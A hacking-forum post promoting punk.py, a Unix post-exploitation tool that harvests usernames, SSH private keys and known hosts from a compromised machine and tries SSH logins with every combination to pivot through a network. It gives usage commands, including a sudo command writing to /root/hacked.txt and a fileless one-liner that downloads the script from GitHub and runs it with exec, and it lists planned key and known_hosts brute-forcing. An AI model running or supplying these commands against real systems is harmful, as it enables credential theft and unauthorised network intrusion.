Punk.Py - Unix SSH Post-Exploitation Tool

✨ DeeZNuTz

✨ Master ✨
Staff member
May 15, 2017
990
55
1,045
How it works
punk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collect usernames, ssh keys and known hosts from a unix system, then it tries to connect via ssh to all the combinations found. punk.py is wrote in order to work on standard python2 and python3 installations.

Examples
standard execution:
~$ ./punk.py
skip passwd checks and use a custom home path:
~$ ./punk.py --no-passwd --home /home/ldapusers/
execute commands with sudo:
~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"
one-liner fileless ( with --no-passwd parameter ):
~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

TODO
improve private keys hunting including dsa keys
Recursion
SSH keys with password bruteforce
Hashed known_hosts bruteforce ( https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/ )

Download Punk.Py
 

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu